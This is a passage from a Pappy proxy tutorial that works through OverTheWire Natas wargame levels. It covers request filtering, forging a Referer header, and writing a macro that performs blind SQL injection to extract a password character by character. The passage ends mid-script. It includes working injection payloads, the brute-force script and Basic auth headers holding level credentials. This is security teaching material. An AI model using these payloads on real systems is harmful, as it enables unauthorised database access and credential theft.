<span class="n">value</span> <span class="o">=</span> <span class="s2">&quot;www.target.org&quot;</span>
</pre></div>
</div>
<p>This filter will only match requests whose host is exactly <code class="docutils literal"><span class="pre">www.target.org</span></code>. When defining our scope, we applied a filter using a <code class="docutils literal"><span class="pre">containsr</span></code> comparer. This matches any request where the field matches a regular expression. Here are a few fields and comparers:</p>
<p>Commonly used fields</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">all</span></code> The full text of the request and the response</li>
<li><code class="docutils literal"><span class="pre">host</span></code> The hostname of where the request is sent</li>
<li><code class="docutils literal"><span class="pre">path</span></code> The target path of the request. ie <code class="docutils literal"><span class="pre">/path/to/page.php</span></code></li>
<li><code class="docutils literal"><span class="pre">verb</span></code> The HTTP verb. ie <code class="docutils literal"><span class="pre">POST</span></code> or <code class="docutils literal"><span class="pre">GET</span></code> (case sensitive!)</li>
<li><code class="docutils literal"><span class="pre">body</span></code> The data section (the body) of either the request or the response</li>
</ul>
<p>Commonly used comparers</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">is</span> <span class="pre">&lt;value&gt;</span></code> The field exactly matches the value</li>
<li><code class="docutils literal"><span class="pre">contains</span> <span class="pre">&lt;value&gt;</span></code> / <code class="docutils literal"><span class="pre">ct</span> <span class="pre">&lt;value&gt;</span></code> The field contains a value</li>
<li><code class="docutils literal"><span class="pre">containsr</span> <span class="pre">&lt;regexp&gt;</span></code> / <code class="docutils literal"><span class="pre">ctr</span> <span class="pre">&lt;regexp&gt;</span></code> The field matches a regexp. You may want to surround the regexp in quotes since a number of regexp characters are also control characters in the command line</li>
</ul>
<p>You can find the rest of the fields and comparers (including some more complex ones) in the actual documentation.</p>
<p>Once you&#8217;ve applied some filters, <code class="docutils literal"><span class="pre">ls</span></code> will only show items that pass all the applied filters. If you want to return to viewing all in-scope items, use <code class="docutils literal"><span class="pre">sr</span></code>. If you want to remove the last applied filter, use <code class="docutils literal"><span class="pre">fu</span></code>.</p>
</div>
<div class="section" id="finding-passwords">
<h4><a class="toc-backref" href="#id19">Finding Passwords</a><a class="headerlink" href="#finding-passwords" title="Permalink to this headline"></a></h4>
<p>While we can&#8217;t find all the passwords with one filter, if we remember how we got the password, we can find it pretty quickly</p>
<p>For natas0 and natas1, the responses had a phrase like &#8220;the password is abc123&#8221;. So we can filter out anything that doesn&#8217;t have the word &#8220;password&#8221; in it.:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
52 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
51 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
50 GET natas4.natas.labs.overthewire.org / 200 OK 0 1019 0.27 --
49 GET natas4.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
48 GET natas3.natas.labs.overthewire.org /s3cr3t/users.txt 200 OK 0 40 0.27 --
46 GET natas3.natas.labs.overthewire.org /icons/text.gif 200 OK 0 229 0.53 --
47 GET natas3.natas.labs.overthewire.org /icons/back.gif 200 OK 0 216 0.53 --
45 GET natas3.natas.labs.overthewire.org /icons/blank.gif 200 OK 0 148 0.53 --
44 GET natas3.natas.labs.overthewire.org /s3cr3t/ 200 OK 0 957 0.26 --
43 GET natas3.natas.labs.overthewire.org /s3cr3t 301 Moved Permanently 0 354 0.27 --
42 GET natas3.natas.labs.overthewire.org /robots.txt 200 OK 0 33 0.29 --
41 GET natas3.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
40 GET natas3.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.28 --
39 GET natas3.natas.labs.overthewire.org / 200 OK 0 923 0.26 --
38 GET natas3.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.28 --
37 GET natas2.natas.labs.overthewire.org /files/users.txt 200 OK 0 145 0.28 --
36 GET natas2.natas.labs.overthewire.org /icons/text.gif 200 OK 0 229 0.47 --
35 GET natas2.natas.labs.overthewire.org /icons/image2.gif 200 OK 0 309 0.47 --
34 GET natas2.natas.labs.overthewire.org /icons/back.gif 200 OK 0 216 0.47 --
33 GET natas2.natas.labs.overthewire.org /icons/blank.gif 200 OK 0 148 0.47 --
32 GET natas2.natas.labs.overthewire.org /files/ 200 OK 0 1153 0.26 --
31 GET natas2.natas.labs.overthewire.org /files 301 Moved Permanently 0 353 0.27 --
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
28 GET natas2.natas.labs.overthewire.org /files/pixel.png 200 OK 0 303 0.27 --
pappy&gt; f body ct password
pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
49 GET natas4.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
38 GET natas3.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.28 --
37 GET natas2.natas.labs.overthewire.org /files/users.txt 200 OK 0 145 0.28 --
26 GET natas2.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
20 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.47 --
24 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
17 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.30 --
14 GET natas1.natas.labs.overthewire.org / 200 OK 0 1063 0.27 --
13 GET natas1.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.27 --
9 GET natas.labs.overthewire.org /js/wechall.js 200 OK 0 1074 0.50 --
6 GET natas.labs.overthewire.org /js/jquery-1.9.1.js 200 OK 0 268381 1.20 --
2 GET natas0.natas.labs.overthewire.org / 200 OK 0 918 0.26 --
1 GET natas0.natas.labs.overthewire.org / 401 Unauthorized 0 479 0.26 --
pappy&gt;
</pre></div>
</div>
<p>It looks like requests 2 and 14 are the ones we&#8217;re looking for (we know the password is on the page and those are the requests to / that have a 200 OK response). Use <code class="docutils literal"><span class="pre">vfs</span></code> to look at the response and you&#8217;ll get the passwords again! It looks like we also found the password from natas2 (the request to /s3cr3t/users.txt).</p>
<p>Anyways, back to Natas!</p>
</div>
</div>
<div class="section" id="natas-4">
<h3><a class="toc-backref" href="#id20">Natas 4</a><a class="headerlink" href="#natas-4" title="Permalink to this headline"></a></h3>
<p>When we visit this page, we get an error saying that they will only display the password if we visit from <code class="docutils literal"><span class="pre">http://natas5.natas.labs.overthewire.org/</span></code>. How does a website track where you came from? The Referer header! Where&#8217;s that defined? In a header! Do we control the headers? Yes! So all we have to do is set the Referer header to be the correct URL and we&#8217;re golden.</p>
<p>To do this, we&#8217;ll be using Pappy&#8217;s interceptor. The interceptor lets you stop a request from the browser, edit it, then send it to the server. These are the commands we&#8217;re going to learn:</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">ic</span> <span class="pre">&lt;req|rsp&gt;+</span></code> Begin interception mode. Intercepts requests and/or responses as decided by the arguments given in the command. <code class="docutils literal"><span class="pre">ic</span> <span class="pre">req</span></code> will only intercept requests, <code class="docutils literal"><span class="pre">ic</span> <span class="pre">rsp</span></code> will only intercept responses, and <code class="docutils literal"><span class="pre">ic</span> <span class="pre">req</span> <span class="pre">rsp</span></code> will intercept both.</li>
</ul>
<p>In this case, we only want to intercept requests, so we&#8217;ll run <code class="docutils literal"><span class="pre">ic</span> <span class="pre">req</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ic req
</pre></div>
</div>
<p>And we&#8217;ll get a screen that says something like:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>Currently intercepting: Requests
0 item(s) in queue.
Press &#39;n&#39; to edit the next item or &#39;q&#39; to quit interceptor.
</pre></div>
</div>
<p>Now refresh the page in your browser. The page will hang like it&#8217;s taking a long time to load. Go back to Pappy, and now the interceptor will say something like:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>Currently intercepting: Requests
1 item(s) in queue.
Press &#39;n&#39; to edit the next item or &#39;q&#39; to quit interceptor.
</pre></div>
</div>
<p>Press <code class="docutils literal"><span class="pre">n</span></code> and the request will be opened for editing! Which editor is used is defined by the <code class="docutils literal"><span class="pre">EDITOR</span></code> environment variable. Use the text editor to add a <code class="docutils literal"><span class="pre">Referer</span></code> header (note that there&#8217;s only one r):</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>GET / HTTP/1.1
Host: natas4.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664
Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va
Connection: keep-alive
Cache-Control: max-age=0
Referer: http://natas5.natas.labs.overthewire.org/
</pre></div>
</div>
<p>Save and quit, then press <code class="docutils literal"><span class="pre">q</span></code> to quit the interceptor. Go back to the browser and you should have the password for natas5! Yay!</p>
<p>Now if you run ls, you&#8217;ll notice that the request we made has a <code class="docutils literal"><span class="pre">q</span></code> in the <code class="docutils literal"><span class="pre">Mngl</span></code> column. This means that we mangled the request. If there&#8217;s an <code class="docutils literal"><span class="pre">s</span></code> in that column, it means we mangled the response. If we ever want to refer to the unmangled version of the request, just prefix the id with a u. For example, you can get the unmangled version of request <code class="docutils literal"><span class="pre">12</span></code> by using the id <code class="docutils literal"><span class="pre">u12</span></code>.</p>
</div>
<div class="section" id="natas-5">
<h3><a class="toc-backref" href="#id21">Natas 5</a><a class="headerlink" href="#natas-5" title="Permalink to this headline"></a></h3>
<p>This one starts with a screen saying you&#8217;re not logged in. This is fine. For this one, you&#8217;ll need to use the interceptor to edit the value of a cookie. I&#8217;ll let you figure that one out.</p>
</div>
<div class="section" id="natas-6">
<h3><a class="toc-backref" href="#id22">Natas 6</a><a class="headerlink" href="#natas-6" title="Permalink to this headline"></a></h3>
<p>This one you should be able to get</p>
</div>
<div class="section" id="natas-7">
<h3><a class="toc-backref" href="#id23">Natas 7</a><a class="headerlink" href="#natas-7" title="Permalink to this headline"></a></h3>
<p>You should get this one. Note the hint on the <a class="reference external" href="http://overthewire.org/wargames/natas/">overthewire website</a>: All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.</p>
</div>
<div class="section" id="natas-8">
<h3><a class="toc-backref" href="#id24">Natas 8</a><a class="headerlink" href="#natas-8" title="Permalink to this headline"></a></h3>
<p>You should be able to get this one. If it sucks, google it.</p>
</div>
<div class="section" id="natas-9">
<h3><a class="toc-backref" href="#id25">Natas 9</a><a class="headerlink" href="#natas-9" title="Permalink to this headline"></a></h3>
<p>For this one, when you view the source you&#8217;ll notice they&#8217;re taking value you entered and inserting it directly into a command line command to grep a file. What we want to do is insert our own arguments to the command. For this one, we will learn how to use the repeater. Here is the command we will learn:</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">rp</span> <span class="pre">&lt;reqid&gt;</span></code> Open the vim repeater with the given request</li>
<li><code class="docutils literal"><span class="pre">&lt;leader&gt;f</span></code> (In the repeater) forward the request</li>
</ul>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">Use <code class="docutils literal"><span class="pre">:wq!</span></code> to quit the repeater without having to save buffers</p>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">You must know the basics of how to use vim for the repeater and have a key bound to the leader. You can find more information on the leader key <a class="reference external" href="https://stackoverflow.com/questions/1764263/what-is-the-leader-in-a-vimrc-file">here</a>. By default &lt;leader&gt; is bound to <code class="docutils literal"><span class="pre">\</span></code>.</p>
</div>
<p>Submit a request then open that request in the repeater:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
196 GET natas9.natas.labs.overthewire.org /index.php?needle=ball&amp;submit=Search 200 OK 0 1686 0.27 --
195 GET natas9.natas.labs.overthewire.org /index-source.html 200 OK 0 1952 0.27 --
... snip ...
pappy&gt; rp 196
</pre></div>
</div>
<p>Vim will open up in a vertical split with the request on the left and the response on the right.</p>
<p>In the repeater, you edit the response on the left, then press the <code class="docutils literal"><span class="pre">&lt;leader&gt;</span></code> key then <code class="docutils literal"><span class="pre">f</span></code> to submit the modified request (note that your cursor must be in the left window). The response will then be put in the right window. This makes it easy to quickly make requests which are all slight variations of each other.</p>
<p>In this case, we&#8217;ll be editing the <code class="docutils literal"><span class="pre">needle</span></code> get parameter. Try changing &#8220;ball&#8221; to &#8220;bill&#8221; and submitting it. You&#8217;ll notice that the output in the right window changes to contain words that have the word &#8220;bill&#8221; in them. The repeater will make it easy to make tweaks to your payload and get quick feedback without having to use the browser.</p>
<p>Use the repeater to solve this challenge (you may need to url encode some characters by hand, unfortunately).</p>
</div>
<div class="section" id="skip-a-few-natas-15">
<h3><a class="toc-backref" href="#id26">Skip a few... Natas 15</a><a class="headerlink" href="#skip-a-few-natas-15" title="Permalink to this headline"></a></h3>
<p>All the challenges up to this point should be doable with the repeater/interceptor. Natas15 is where things get hairy though. This is a blind SQL injection, and you&#8217;ll have to write a script to do it. Luckily for us, writing scripts using Pappy is easy. If you&#8217;re lazy and don&#8217;t want to actually do the challenges, google the password for natas15 then come back.</p>
<p>Commands we&#8217;ll learn:</p>
<ul class="simple">
<li><code class="docutils literal"><span class="pre">gma</span> <span class="pre">&lt;name&gt;</span> <span class="pre">&lt;reqid(s)&gt;</span></code> Generate a macro with objects pre-defined for the given requests</li>
<li><code class="docutils literal"><span class="pre">lma</span></code> Load macros</li>
<li><code class="docutils literal"><span class="pre">rma</span> <span class="pre">&lt;name&gt;</span> <span class="pre">[args]</span></code> Run a macro, optionally with arguments</li>
</ul>
<p>So the first thing we&#8217;ll do is submit a request to have a base request that we can modify. Submit a request with any username. You should get a response back saying the user doesn&#8217;t exist. Now we&#8217;ll generate a macro and use that request as a base for our script:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
224 POST natas15.natas.labs.overthewire.org /index.php 200 OK 14 937 0.27 --
223 POST natas15.natas.labs.overthewire.org /index.php 200 OK 12 937 0.27 --
222 GET natas15.natas.labs.overthewire.org /index-source.html 200 OK 0 3325 0.28 --
221 GET natas15.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 308 0.25 --
220 GET natas15.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 308 0.27 --
219 GET natas15.natas.labs.overthewire.org / 200 OK 0 1049 0.37 --
218 GET natas15.natas.labs.overthewire.org / 401 Unauthorized 0 480 0.27 --
... snip ...
pappy&gt; gma brute 224
Wrote script to macro_brute.py
pappy&gt;
</pre></div>
</div>
<p>Now open up <code class="docutils literal"><span class="pre">macro_brute.py</span></code> in your favorite text editor. You should have a script that looks like this:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="c1">###########</span>
<span class="c1">## Requests</span>
<span class="c1"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c1"># as needed to create modified requests</span>
<span class="c1">##</span>
<span class="n">req1</span> <span class="o">=</span> <span class="n">Request</span><span class="p">((</span>
<span class="s1">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;username=admin&#39;</span>
<span class="p">))</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="c1"># Example:</span>
<span class="c1"># req = req0.copy() # Copy req0</span>
<span class="c1"># req.submit() # Submit the request to get a response</span>
<span class="c1"># print req.response.raw_headers # print the response headers</span>
<span class="c1"># req.save() # save the request to the data file</span>
<span class="c1"># or copy req0 into a loop and use string substitution to automate requests</span>
<span class="k">pass</span>
</pre></div>
</div>
<p>Pappy will generate a script and create a <code class="docutils literal"><span class="pre">Request</span></code> object that you can use. Check out the real documentation to see everything you can do with a <code class="docutils literal"><span class="pre">Request</span></code> object. For now you just need to know a few things about it:</p>
<ul class="simple">
<li><a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.submit" title="pappyproxy.http.Request.submit"><code class="xref py py-func docutils literal"><span class="pre">submit()</span></code></a> Submit the request and store the response object</li>
<li><a class="reference internal" href="pappyproxy.html#pappyproxy.http.Request.save" title="pappyproxy.http.Request.save"><code class="xref py py-func docutils literal"><span class="pre">save()</span></code></a> Save the request/response to the data file</li>
<li><code class="docutils literal"><span class="pre">post_params</span></code> A <a class="reference internal" href="pappyproxy.html#pappyproxy.http.RepeatableDict" title="pappyproxy.http.RepeatableDict"><code class="xref py py-class docutils literal"><span class="pre">RepeatableDict</span></code></a> that represents the post parameters of the request. Can set/get prameters the same way as a dictionary.</li>
</ul>
<p>It is suggested you go through the documentation to learn the rest of the attributes/functions.</p>
<p>To start out simple, we&#8217;ll write a macro that lets us check a username from the Pappy console. To define a function, you define the <code class="docutils literal"><span class="pre">run_macro</span></code> function. The function is passed a list of arguments which represent the arguments entered. Here a <code class="docutils literal"><span class="pre">run_macro</span></code> function that we can define that will check if a user exists:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">to_check</span> <span class="o">=</span> <span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="c1"># get the username to check</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span> <span class="c1"># make a copy of the base request</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">to_check</span> <span class="c1"># set the username param of the request</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span> <span class="c1"># submit the request</span>
<span class="k">if</span> <span class="s2">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span> <span class="c1"># check if the username is valid</span>
<span class="k">print</span> <span class="s2">&quot;</span><span class="si">%s</span><span class="s2"> is not a user&quot;</span> <span class="o">%</span> <span class="n">to_check</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s2">&quot;</span><span class="si">%s</span><span class="s2"> is a user!&quot;</span> <span class="o">%</span> <span class="n">to_check</span>
</pre></div>
</div>
<p>Then to run it:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;Macro Macro 41855887 (brute)&gt;&quot;
pappy&gt; rma brute admin
admin is not a user
pappy&gt; rma brute fooooo
fooooo is not a user
pappy&gt; rma brute natas16
natas16 is a user!
pappy&gt;
</pre></div>
</div>
<p>Awesome! Notice how we didn&#8217;t have to deal with authentication either. This is because the authentication is handled by the <code class="docutils literal"><span class="pre">Authorization</span></code> header which was included in the generated request.</p>
<p>Time to add the SQL injection part. If we look at the source, we see that this is the SQL query that checks the username:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$query = &quot;SELECT * from users where username=\&quot;&quot;.$_REQUEST[&quot;username&quot;].&quot;\&quot;&quot;;
</pre></div>
</div>
<p>So to escape it, we use a payload like:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>username&quot; OR 1=1; #
</pre></div>
</div>
<p>In this case, any username that ends in <code class="docutils literal"><span class="pre">&quot;</span> <span class="pre">OR</span> <span class="pre">1=1;</span> <span class="pre">#</span></code> will be considered a valid username. Let&#8217;s try this out:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; rma brute &quot;foo\&quot; OR 1=1;&quot;
foo&quot; OR 1=1; is a user!
pappy&gt; rma brute &quot;fooooooo\&quot; OR 1=1;&quot;
fooooooo&quot; OR 1=1; is a user!
pappy&gt;
</pre></div>
</div>
<p>Great! Now we can check any true/false condition we want. In this case, we want to check if a certain character is at a certain position in the <code class="docutils literal"><span class="pre">password</span></code> column. We do this with the <code class="docutils literal"><span class="pre">ASCII</span></code> and <code class="docutils literal"><span class="pre">SUBSTRING</span></code> functions. So something like this will check if the first character is an <code class="docutils literal"><span class="pre">A</span></code>.:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="s1">&#39;natas16&quot; AND ASCII(SUBSTRING(password, 0, 1)) = 41; #&#39;</span>
</pre></div>
</div>
<p>Alright, let&#8217;s update our macro to find the first character of the password.:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="c1">###########</span>
<span class="c1">## Requests</span>
<span class="c1"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c1"># as needed to create modified requests</span>
<span class="c1">##</span>
<span class="n">req1</span> <span class="o">=</span> <span class="n">Request</span><span class="p">((</span>
<span class="s1">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;username=admin&#39;</span>
<span class="p">))</span>
<span class="k">def</span> <span class="nf">check_char</span><span class="p">(</span><span class="n">char</span><span class="p">,</span> <span class="n">pos</span><span class="p">):</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;natas16&quot; AND ASCII(SUBSTRING(password, </span><span class="si">%d</span><span class="s1">, 1)) = </span><span class="si">%d</span><span class="s1">; #&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">))</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">payload</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">if</span> <span class="s2">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">valid_chars</span> <span class="o">=</span> <span class="s2">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890&quot;</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">valid_chars</span><span class="p">:</span>
<span class="k">print</span> <span class="s1">&#39;Trying </span><span class="si">%s</span><span class="s1">...&#39;</span> <span class="o">%</span> <span class="n">c</span>
<span class="k">if</span> <span class="n">check_char</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="mi">1</span><span class="p">):</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> is the first char!&#39;</span> <span class="o">%</span> <span class="n">c</span>
<span class="k">return</span>
<span class="k">print</span> <span class="s2">&quot;The script didn&#39;t work&quot;</span>
</pre></div>
</div>
<p>And when we run it...:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;Macro Macro 41855887 (brute)&gt;&quot;
pappy&gt; rma brute
Trying a...
Trying b...
Trying c...
Trying d...
... snip ...
Trying U...
Trying V...
Trying W...
W is the first char!
pappy&gt;
</pre></div>
</div>
<p>We find the first character! Woo! Next we just have to do this for each position. Even through we don&#8217;t know the length of the password, we will know that the password is over when none of the characters are valid. So let&#8217;s update our macro:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="c1">###########</span>
<span class="c1">## Requests</span>
<span class="c1"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c1"># as needed to create modified requests</span>
<span class="c1">##</span>
<span class="n">req1</span> <span class="o">=</span> <span class="n">Request</span><span class="p">((</span>
<span class="s1">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s1">&#39;</span>
